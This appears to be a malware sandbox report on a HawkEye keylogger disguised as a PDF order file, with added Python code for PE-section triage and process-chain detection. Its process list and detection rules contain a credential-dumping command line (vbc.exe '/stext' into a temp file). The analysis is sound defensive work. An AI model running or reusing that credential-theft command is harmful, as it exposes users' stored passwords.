                                                                                                                                                                      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1572864
                                                                                                                                                                      Entropy (8bit):4.239826107855132
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:AiwUr9bffhQ4HzTwWt9fw/3Gt+MEPAmSMYm0VAQUVpm++ywV:5wUr9bffhQEzTwyZt
                                                                                                                                                                      MD5:FC0ECF3DFFC95B0D0B66F85A5377B38F
                                                                                                                                                                      SHA1:5E0A6E3E964D4F7366F91C5C3426DE40C2334345
                                                                                                                                                                      SHA-256:E18926AD872FB94F16F2235C5B9FB4446B15148B2104E88457E5DCC86E47EF14
                                                                                                                                                                      SHA-512:E3A3A6136C2FA684B5E3FE5361D997F52B5562201AEE0939BECB8BECC0212C5953954DB8D9CCA0F5D16B989C095DCD9E429B5199CFEA8A8E0087434837C62EB5
                                                                                                                                                                      Malicious:false
Preview: regf hive header referencing \AppCompat\Programs\Amcache.hve; raw dump omitted
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):24576
                                                                                                                                                                      Entropy (8bit):3.5793505518149167
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:G/EA52JOomTv+Xyb5R5YPv41gnVVeeDzej1NKZtjbT8G/wmAtWA7jm:6f2JONT2Xi5Rtg/eeDze5NYtj0G/wmb2
                                                                                                                                                                      MD5:61F6E0001723DE42C363948B8832922B
                                                                                                                                                                      SHA1:A8AAF1D133EDBD05B3B64F2A487D486E47C92DE5
                                                                                                                                                                      SHA-256:DC60F4D015083ECA2C0C5EA9135C1860B6DC0CD9B59581F8B07DD6B5ED85CCC6
                                                                                                                                                                      SHA-512:389E8A77497189B8AD2DE15DA2B9A4EDB59BBA436154E85936EF50A2E9D0A37C8386ADF773508FB1287DECA3BB55AB977CAE3796470608B2CBDBC68035C001C1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:regfG...G...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm...K[...................................................................................................................................................................................................................................................................................................................................................HvLE.^......G...........!.\6....v.................................. ..hbin................p.\..,..........nk,..A.K[................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ..A.K[....... ........................... .......Z.......................Root........lf......Root....nk ..A.K[................................... ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.984856690873441
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 50.01%
• Win32 Executable (generic) a (10002005/4) 49.96%
• Win16/32 Executable Delphi generic (2074/23) 0.01%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: ORDER-NEW....pdf.exe
File size: 782848
MD5: 1baec657210438b896934a7a793c204c
SHA1: 4729717dab3dd01b2ca591c86a02176386e02356
SHA256: b041030454ea89a3ff2326405d3bf230f53daa9ecd50c3e3882a1ad6c0d2427c
SHA512: bdd388f9a1825bb9d21b8871535fc997751255ad2cf00dae12713e2a62aef4471b2d59d35430d45fc606ada32ce89b52f835623194a2d268006af43d093a8b4c
SSDEEP: 12288:PLpBX5M15aBnwpO06AKyCIy7OX4CzuEXU2x0V9CfArXVUVUU7I5e:DpBpGpOUKPW4CzuEkqw9CfvVUt5
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....-O.....................8.......`...`... ....@.. ....................................@................................
Icon Hash: 00828e8e8686b000
Entrypoint: 0x4c600a
Entrypoint Section:
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x4F2DFFA8 [Sun Feb 5 04:03:52 2012 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [004C6000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xb640c          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xc2000          0x668         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xc4000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0xc6000          0x8
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0xb6000          0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                      )xrUhX0x20000xb2d4c0xb2e00False1.00031528433data7.99978046274IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .text0xb60000xb2980xb400False0.723328993056data6.66811735085IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .rsrc0xc20000x6680x800False0.35205078125data3.64270697756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .reloc0xc40000xc0x200False0.044921875data0.09262353601IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      0xc60000x100x200False0.044921875data0.142635768149IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
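
The section table is what marks this file as a loader wrapped around an encrypted payload: a 0xb2d4c-byte section with a garbage name, an entropy of 7.9998 (8.0 is the maximum), a ZLIB complexity of about 1.0 (it does not compress) and read/write/execute permissions, followed by a small .text holding the .NET stub and a nameless 16-byte code section. The Python below is an added example, not Joe Sandbox code: it shows how the Entropy column is computed and applies the usual section heuristics to the values transcribed from this table. The section-name alphabet, the 7.5 entropy threshold and the standard-name list are assumptions of this example, not the sandbox's own logic.

```python
"""Section-table triage against the values listed in the report above.

Added example (not Joe Sandbox code). The section records are transcribed
from the report; the name rules and the entropy threshold are assumptions
of this example, not the sandbox's own logic.
"""
import math
import re
from dataclasses import dataclass
from typing import Dict, FrozenSet, List

# Names the Microsoft toolchains emit; anything else is worth a look (assumed list).
STANDARD_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                  ".edata", ".pdata", ".bss", ".tls", ".CRT"}
NAME_CHARS = re.compile(r"^[A-Za-z0-9._$]*$")   # assumed "ordinary" section-name alphabet
HIGH_ENTROPY = 7.5                               # assumed threshold; 8.0 is the maximum


@dataclass(frozen=True)
class Section:
    name: str
    virtual_address: int
    virtual_size: int
    raw_size: int
    entropy: float
    characteristics: FrozenSet[str]


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 (a single byte value) to 8.0 (uniform): the report's Entropy column."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def triage_section(s: Section) -> List[str]:
    """Return the reasons a section deserves attention (empty list = unremarkable)."""
    findings = []
    flags = s.characteristics
    if s.entropy >= HIGH_ENTROPY:
        findings.append("high entropy: packed or encrypted payload")
    if "IMAGE_SCN_MEM_EXECUTE" in flags and "IMAGE_SCN_MEM_WRITE" in flags:
        findings.append("writable and executable (payload can be decrypted and run in place)")
    if not s.name:
        findings.append("nameless section")
    elif not NAME_CHARS.match(s.name):
        findings.append("section name contains special characters")
    elif s.name not in STANDARD_NAMES:
        findings.append("non-standard section name")
    if s.virtual_size > 2 * max(s.raw_size, 1):
        findings.append("virtual size far exceeds raw size (filled at runtime)")
    return findings


def triage(sections: List[Section]) -> Dict[str, List[str]]:
    """Key by hex RVA rather than name, because names may be empty or duplicated."""
    return {f"0x{s.virtual_address:x}": triage_section(s) for s in sections}


RX = frozenset({"IMAGE_SCN_MEM_READ", "IMAGE_SCN_MEM_EXECUTE", "IMAGE_SCN_CNT_CODE"})
R_INIT = frozenset({"IMAGE_SCN_MEM_READ", "IMAGE_SCN_CNT_INITIALIZED_DATA"})

# Transcribed from the section table above.
REPORT_SECTIONS = [
    Section(")xrUhX", 0x2000, 0xb2d4c, 0xb2e00, 7.99978046274,
            frozenset({"IMAGE_SCN_MEM_EXECUTE", "IMAGE_SCN_CNT_INITIALIZED_DATA",
                       "IMAGE_SCN_MEM_WRITE", "IMAGE_SCN_MEM_READ"})),
    Section(".text", 0xb6000, 0xb298, 0xb400, 6.66811735085, RX),
    Section(".rsrc", 0xc2000, 0x668, 0x800, 3.64270697756, R_INIT),
    Section(".reloc", 0xc4000, 0xc, 0x200, 0.09262353601, R_INIT | {"IMAGE_SCN_MEM_DISCARDABLE"}),
    Section("", 0xc6000, 0x10, 0x200, 0.142635768149, RX),
]

if __name__ == "__main__":
    for rva, reasons in triage(REPORT_SECTIONS).items():
        print(rva, reasons or "ok")
```

Running it flags only the first and last rows: the `)xrUhX` section trips the entropy, RWX and special-character checks at once, while .text, .rsrc and .reloc look like an ordinary .NET assembly. That split, a single opaque blob plus a tiny managed stub, is the shape to expect from a .NET crypter, and the same checks apply to any PE you pull the section table from with pefile or similar.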
Name | RVA | Size | Type | Language | Country
RT_VERSION | 0xc20a0 | 0x3d8 | data | |
RT_MANIFEST | 0xc2478 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

DLL | Import
mscoree.dll | _CorExeMain

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright 2018 Park Place Entertainment Corp
Assembly Version | 0.0.0.0
InternalName | ORDER-NEW.exe
FileVersion | 10.7.31.1
CompanyName | Park Place Entertainment Corp
Comments | utogogesisisakisikucic
ProductName | Directory Listing handler
ProductVersion | 10.7.31.1
FileDescription | Directory Listing handler
OriginalFilename | ORDER-NEW.exe
                                                                                                                                                                      No network behavior found

                                                                                                                                                                      Start time:01:10:02
                                                                                                                                                                      Start date:21/01/2022
                                                                                                                                                                      Path:C:\Users\user\Desktop\ORDER-NEW....pdf.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\ORDER-NEW....pdf.exe"
                                                                                                                                                                      Imagebase:0x7f0000
                                                                                                                                                                      File size:782848 bytes
                                                                                                                                                                      MD5 hash:1BAEC657210438B896934A7A793C204C
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000000.00000000.703620754.0000000005AF1000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000000.703620754.0000000005AF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000000.00000002.733884470.00000000047C0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.733884470.00000000047C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000000.00000000.702281950.00000000047C0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000000.702281950.00000000047C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000000.00000000.712572110.0000000005AF1000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000000.712572110.0000000005AF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000000.00000002.738563781.0000000005AF1000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.738563781.0000000005AF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000000.00000000.711229338.00000000047C0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000000.711229338.00000000047C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:low

                                                                                                                                                                      Start time:01:10:14
                                                                                                                                                                      Start date:21/01/2022
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                      Imagebase:0xcc0000
                                                                                                                                                                      File size:98912 bytes
                                                                                                                                                                      MD5 hash:6807F903AC06FF7E1670181378690B22
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000005.00000000.689728198.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000000.689728198.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.933455184.0000000007E95000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.933455184.0000000007E95000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000005.00000002.930832405.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.930832405.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000005.00000000.690486770.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000000.690486770.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.933041044.0000000006FAE000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000005.00000002.933674801.0000000009480000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.933674801.0000000009480000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.933674801.0000000009480000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000003.692797770.0000000008705000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000003.692797770.0000000008705000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000005.00000000.690115034.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000000.690115034.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000005.00000000.691070548.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000000.691070548.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      Start time:01:10:19
                                                                                                                                                                      Start date:21/01/2022
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpB254.tmp
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:1171592 bytes
                                                                                                                                                                      MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000000.702441264.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000000.704117458.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000000.702788844.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000000.703279347.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      Start time:01:10:26
                                                                                                                                                                      Start date:21/01/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6860 -s 1156
                                                                                                                                                                      Imagebase:0x160000
                                                                                                                                                                      File size:434592 bytes
                                                                                                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      Start time:01:10:28
                                                                                                                                                                      Start date:21/01/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6860 -s 1156
                                                                                                                                                                      Imagebase:0x160000
                                                                                                                                                                      File size:434592 bytes
                                                                                                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
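
The process list above is the credential-theft stage of the sample: AppLaunch.exe, a .NET Framework host launched with no arguments, carries HawkEye Yara hits at 0x402000, and the vbc.exe that follows is started with `/stext <temp file>` while its image at 0x400000 matches WebBrowserPassView. `/stext` is the switch NirSoft's password-recovery tools use to write their results to a text file; the genuine vbc.exe is the Visual Basic compiler and has no such option. WerFault.exe -p 6860 then reports a crash. The Python below is an added example, not Joe Sandbox code: it runs those three checks over constructed process-creation events built from this list. The PIDs other than WerFault's target 6860, the parent-child links and the event field names are assumptions of this example, since this excerpt of the report gives no process tree.

```python
"""Process-creation detection for the vbc.exe '/stext' chain listed above.

Added example (not Joe Sandbox code). The events are constructed from the
process list in the report; PIDs other than WerFault's target 6860, the
parent links and the field names are assumptions of this example.
"""
import re
from typing import Dict, List, Set, Tuple

# .NET Framework hosts that appear in the report; extend the set for your estate.
DOTNET_HOSTS = {"applaunch.exe", "vbc.exe"}
# NirSoft "save report as text" switch; the real vbc.exe (VB compiler) has no /stext.
STEXT = re.compile(r'(?i)(?:^|\s)/stext\s+"?([^"]+?)"?\s*$')
WERFAULT_TARGET = re.compile(r"(?i)\bWerFault\.exe\b.*\s-p\s+(\d+)")
USER_PROFILE = re.compile(r"(?i)^C:\\Users\\")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def arguments(cmdline: str) -> str:
    """Everything after the program token, whether or not that token is quoted."""
    c = cmdline.strip()
    if c.startswith('"'):
        rest = c[1:].split('"', 1)
        return rest[1].strip() if len(rest) == 2 else ""
    parts = c.split(None, 1)
    return parts[1].strip() if len(parts) == 2 else ""


def detect(events: List[Dict]) -> List[Tuple[int, str]]:
    """Return (pid, reason) pairs; an empty list means nothing matched."""
    by_pid = {e["pid"]: e for e in events}
    hits: List[Tuple[int, str]] = []
    flagged: Set[int] = set()
    for e in events:
        img, args = basename(e["image"]), arguments(e["cmdline"])
        parent = by_pid.get(e["ppid"])
        m = STEXT.search(args)
        if m:
            # Rule 1: a NirSoft password-recovery tool dumping to a file, here inside vbc.exe.
            hits.append((e["pid"], f"{img} invoked with /stext, dumping credentials to {m.group(1)}"))
            flagged.add(e["pid"])
        elif img in DOTNET_HOSTS and args == "" and parent and USER_PROFILE.match(parent["image"]):
            # Rule 2: a .NET host started with no arguments by a binary in the user profile,
            # the process-hollowing shape in the report (parent link assumed).
            hits.append((e["pid"], f"{img} started without arguments by "
                                   f"{basename(parent['image'])} (hollowing candidate)"))
            flagged.add(e["pid"])
    for e in events:
        # Rule 3: a crash report for a flagged host corroborates the injection.
        m = WERFAULT_TARGET.search(e["cmdline"])
        if m and int(m.group(1)) in flagged:
            hits.append((e["pid"], f"WerFault.exe reporting crash of flagged pid {m.group(1)}"))
    return hits


# Constructed from the process list above; PIDs (except 6860) and parent links are assumed.
EVENTS = [
    {"pid": 6780, "ppid": 4120, "image": r"C:\Users\user\Desktop\ORDER-NEW....pdf.exe",
     "cmdline": r'"C:\Users\user\Desktop\ORDER-NEW....pdf.exe"'},
    {"pid": 6860, "ppid": 6780, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"},
    {"pid": 6904, "ppid": 6860, "image": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpB254.tmp"'},
    {"pid": 6932, "ppid": 6860, "image": r"C:\Windows\SysWOW64\WerFault.exe",
     "cmdline": r"C:\Windows\SysWOW64\WerFault.exe -u -p 6860 -s 1156"},
    # Control (constructed): a genuine compile parented by MSBuild must not fire.
    {"pid": 7010, "ppid": 5000, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" /out:hello.exe hello.vb'},
]

if __name__ == "__main__":
    for pid, reason in detect(EVENTS):
        print(pid, reason)
```

Rule 1 is the high-confidence one and stands on its own; rules 2 and 3 are the supporting context that turns an alert into a chain. The same field shapes are what Sysmon event 1 or an EDR process-creation feed provides, so the logic ports directly to a SIEM query.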

                                                                                                                                                                      Start time:01:11:25
                                                                                                                                                                      Start date:21/01/2022
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpB202.tmp
                                                                                                                                                                      Imagebase:0x400000
